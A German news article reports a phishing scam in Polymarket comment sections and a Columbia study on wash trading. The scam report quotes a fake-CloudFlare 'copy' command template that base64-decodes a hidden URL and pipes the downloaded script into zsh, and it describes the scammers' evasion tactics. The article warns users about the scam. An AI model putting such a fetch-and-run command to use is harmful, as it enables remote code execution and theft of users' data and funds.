Phishing-Links in privaten Polymarket-Märkten: Nutzer schlagen Alarm

Polymarket sorgt erneut für Schlagzeilen, diesmal weil einer der erfahrensten Händler mit dem Pseudonym „25usdc“ Alarm schlug wegen eines Betrugs, bei dem die Kommentarspalte der Plattform genutzt wird, um ahnungslose Nutzer auszubeuten. 

Dies geschieht zu einem entscheidenden Zeitpunkt für die Polymarket-Plattform, da sie sich auf den Wiedereintritt in den US-Markt vorbereitet und darum kämpft, Konkurrenten wie Kalshi zu überholen. 

Polymarket-Händler in höchster Alarmbereitschaft 

Laut 25usdcnutzen Hacker den Kommentarbereich von Polymarket für einen Betrug, und bisher haben Benutzer über 500.000 US-Dollar verloren.

„Sie sagen: ‚Warum handelst du nicht auf den privaten Märkten von Polymarket? Dort sind die Chancen immer viel besser!‘“, schrieb 25usdc, bevor er erklärte, wie der ganze Betrug funktioniert. 

Seinen Angaben zufolge beginnt alles damit, dass sie von zwei verschiedenen Konten aus sowohl Ja- als auch Nein-Aktien für einen Markt kaufen. So bleiben ihre Kommentare auch dann sichtbar, wenn der „Inhaber“-Filter aktiviert ist. Anschließend veröffentlichen sie eine URL zu ihrer Website in verschleierter Form.

Die URL führt den ahnungslosen Nutzer auf eine professionell wirkende Seite mit einem Polymarket-Logo und fordert ihn zur Anmeldung per E-Mail auf. Nach der Bestätigung der E-Mail-Adresse öffnet sich ein neues Fenster, in dem der Nutzer aufgefordert wird, seine Aktivitäten zu bestätigen – ein Vorgehen, das CloudFlare imitiert. 

25usdc behauptet jedoch, dass beim Klicken auf „Kopieren“ stattdessen ein Befehl kopiert wird, der etwa so aussieht: „curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh“. Wenn der Benutzer den Fehler begeht, diesen Befehl in sein Terminal einzufügen, dekodiert er als Erstes die Base64-kodierte Zeichenkette (eine Server-URL), lädt anschließend ein Skript von diesem Server herunter und führt es sofort aus. 

Das betreffende Skript kann beliebige Inhalte enthalten, und es wird angeblich keine Popup-Warnung geben, zu diesem Zeitpunkt ist der Schaden bereits angerichtet, und die einzige Abhilfe besteht laut 25usdc möglicherweise darin, das WLAN auszuschalten. 

„Letztendlich sammeln sie Daten, protokollieren alles, was auf Ihrem System passiert, und senden eine ZIP-Datei an ihren Server zurück“, schrieb 25usdc. „Anschließend nutzen sie diese Daten, um sich in Ihre Konten einzuloggen und Ihr Geld zu stehlen.“

Was ihm außerdem auffiel, war die Sorgfalt, mit der die Gruppe vorgeht; zum Beispiel verwischen sie ihre Spuren, indem sie häufig die Wallets wechseln, verschleiern bei jedem Schritt und schalten sogar den Server ab, der die Payloads sendet und die protokollierten Daten empfängt, wenn kein aktives Opfer vorhanden ist.

„Ich denke, der beste Weg, dieses Problem anzugehen, ist, vertrauenswürdigen Nutzern die Möglichkeit zu geben, Kommentare zu überprüfen, oder ein System für negative Bewertungen einzuführen, das Beiträge mit vielen negativen Bewertungen ausblendet“, schloss 25usdc und wies gleichzeitig darauf hin, dass die einfache Warnung, die Polymarket derzeit anzeigt, nicht ausreichen wird. 

Hinweis: Es gibt keine Polymarket-Website für den „privaten Markt“ mit „besseren Gewinnchancen“

Geben Sie Ihre Polymarket-E-Mail-Adresse oder Ihren Anmelde-Bestätigungscode niemals auf einer anderen Website als unserer offiziellen Website ein.

— Polymarket Traders (@PolymarketTrade) 9. November 2025

Eine neue Studie behauptet, dass das Handelsvolumen von Polymarket durch Scheinhandel künstlich hochgehalten wird

Wie Cryptopolitan berichtete, behauptet eine kürzlich veröffentlichte Studie von Forschern der Columbia University, dass das Handelsvolumen auf Polymarket durch Wash-Trading erheblich aufgebläht wurde. 

Der von den Autoren als „künstlicher Handel“ bezeichnete Vorgang variierte im Laufe der Zeit, machte aber nach ihren Angaben in den letzten drei Jahren durchschnittlich 25 % aller Käufe und Verkäufe auf Polymarket aus. 

Der Artikel wurde noch keinem Peer-Review unterzogen, ist aber bereits auf der Open-Access-Forschungsplattform SSRN verfügbar und wird derzeit von Polymarket geprüft. 

Um es klarzustellen: Die Autoren werfen Polymarket selbst nicht direkt Wash-Trading vor. Sie haben jedoch Elemente der kryptobasierten Struktur der Börse hervorgehoben, die diese Behauptung plausibel erscheinen lassen.

Sie haben außerdem angedeutet, dass die Kunden des Unternehmens möglicherweisedentvoneinander solche Wash-Trading-Aktivitäten durchgeführt haben, um ihre Chancen auf Zugang zu einem firmeneigenen digitalen Token zu verbessern, dessen Einführung der Gründer des Unternehmens, Shayne Coplan, erst am 8. Oktober angedeutet hatte. 

„Ich bin zuversichtlich, dass Polymarket die Analyse in unserer Studie begrüßen wird“, schrieb Yash Kanoria, Professor an der Columbia Business School und einer der vier Koautoren der Studie, in einer E-Mail. „Wash-Trading trägt weder zur Liquidität noch zu Informationen am Markt bei, daher erscheint es sinnvoll, zwischen authentischem und unauthentischem Handelsvolumen zu unterscheiden.“

Sollte ein Teil des Handelsvolumens von Polymarket tatsächlich „fiktiv“ sein, könnte dies laut der Studie das Verständnis der relativen Stärke von Polymarket in der Branche verändern und auch die gegenwärtige Vorstellung untergraben, dass Prognosemärkte die „Weisheit einer größeren Masse“ widerspiegeln

„Das Potenzial für groß angelegtes Wash-Trading bedeutet, dass das Handelsvolumen als Messgröße für authentische Plattformaktivitäten unzuverlässig sein kann, insbesondere bei Kryptowährungsbörsen, die möglicherweise keine angemessenen Sicherheitsvorkehrungen getroffen haben“, schlussfolgerten die Autoren.